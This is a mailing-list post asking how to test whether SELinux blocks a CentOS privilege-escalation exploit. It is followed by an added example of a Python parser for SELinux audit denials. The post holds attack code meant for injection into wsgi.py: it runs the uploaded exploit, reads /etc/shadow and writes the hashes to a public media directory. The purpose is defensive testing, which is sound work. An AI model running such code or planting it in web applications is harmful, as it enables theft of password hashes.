[CentralOH] Help Constructing a Science Experiment
Joshua Kramer
joskra42.list at gmail.com
Tue May 14 19:27:53 CEST 2013
Hello,
I just read about this CentOS vulnerability:
https://www.centos.org/modules/newbb/viewtopic.php?topic_id=42827&forum=59
I am trying to construct a science experiment to see if SELinux properly
mitigates this attack. I spun up a new VM of my dev server, and I have a
website running via Apache and WSGI. I am trying to simulate a potential
attack whereby someone uploads the exploit to the media directory of a
Mezzanine-based app, and runs it by injecting malicious code into wsgi.py.
Far-fetched, I know, but it's a science experiment after all.
The code noted below just causes the Apache thread to hang. I don't show
any SELinux AVC denials so I don't think the executable is being run. (But
that might not be a valid assertion, seeing that I'm testing SELinux in the
first place.)
Does anyone see any glaring issues here?
Cheers,
-JK
# Evil hack: This command line works when run as a non-root user:
# echo "cat /etc/shadow" |
#   /srv/website/www/website/static/media/semtex_exploit >
#   /srv/website/www/website/static/media/passwords
from subprocess import Popen, PIPE
cmd = '/srv/website/www/website/static/media/semtex_exploit'
p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.stdin.write("cat /etc/shadow\n")
mtext = p.stdout.read()
with open('/srv/website/www/website/static/media/shadow', 'a') as the_file:
    the_file.write(mtext)
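Added example, not part of the original message: one way to test the "no AVC denials" observation is to filter audit records by the Apache domain and pair each denial with the SYSCALL record of the same event. The log lines are constructed, and the httpd_t domain, the httpd_sys_content_t label and the function names are assumptions.

```python
import re

# Constructed audit.log sample (not from the original post). The httpd_t
# domain and httpd_sys_content_t label are assumptions (targeted policy).
SAMPLE_AUDIT_LOG = """\
type=AVC msg=audit(1368552473.101:411): avc:  denied  { execute } for  pid=2345 comm="httpd" name="semtex_exploit" dev=dm-0 ino=131234 scontext=system_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:httpd_sys_content_t:s0 tclass=file
type=SYSCALL msg=audit(1368552473.101:411): arch=c000003e syscall=59 success=no exit=-13 comm="httpd" exe="/usr/sbin/httpd"
type=AVC msg=audit(1368552480.220:412): avc:  denied  { read } for  pid=901 comm="ntpd" name="drift" dev=dm-0 ino=7781 scontext=system_u:system_r:ntpd_t:s0 tcontext=system_u:object_r:var_t:s0 tclass=file
type=AVC msg=audit(1368552491.007:413): avc:  denied  { append } for  pid=2345 comm="httpd" name="shadow" dev=dm-0 ino=131240 scontext=system_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:httpd_sys_content_t:s0 tclass=file
type=SYSCALL msg=audit(1368552491.007:413): arch=c000003e syscall=2 success=no exit=-13 comm="httpd" exe="/usr/sbin/httpd"
"""

EVENT_RE = re.compile(
    r'type=(?P<type>\w+) msg=audit\([\d.]+:(?P<serial>\d+)\): (?P<body>.*)')
PERMS_RE = re.compile(r'avc:\s+denied\s+\{ ([^}]+) \}')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_events(log_text):
    """Group audit records by event serial: {serial: {record_type: fields}}."""
    events = {}
    for line in log_text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in KV_RE.findall(m.group('body'))}
        perms = PERMS_RE.search(m.group('body'))
        if perms:
            fields['perms'] = perms.group(1).split()
        events.setdefault(int(m.group('serial')), {})[m.group('type')] = fields
    return events

def denials_for_domain(log_text, domain='httpd_t'):
    """Return AVC denials whose source context type equals `domain`."""
    hits = []
    for serial, recs in sorted(parse_events(log_text).items()):
        avc = recs.get('AVC')
        if not avc or 'perms' not in avc:
            continue
        ctx = avc.get('scontext', '').split(':')
        if len(ctx) < 3 or ctx[2] != domain:
            continue
        syscall = recs.get('SYSCALL', {})
        hits.append({'serial': serial, 'perms': avc['perms'],
                     'name': avc.get('name'), 'tclass': avc.get('tclass'),
                     'blocked': syscall.get('success') == 'no'})
    return hits

if __name__ == '__main__':
    for hit in denials_for_domain(SAMPLE_AUDIT_LOG):
        print(hit)
```

An empty result only means something if SELinux is enforcing (`getenforce`) and dontaudit rules are not hiding the denial (`semodule -DB` rebuilds the policy with them disabled).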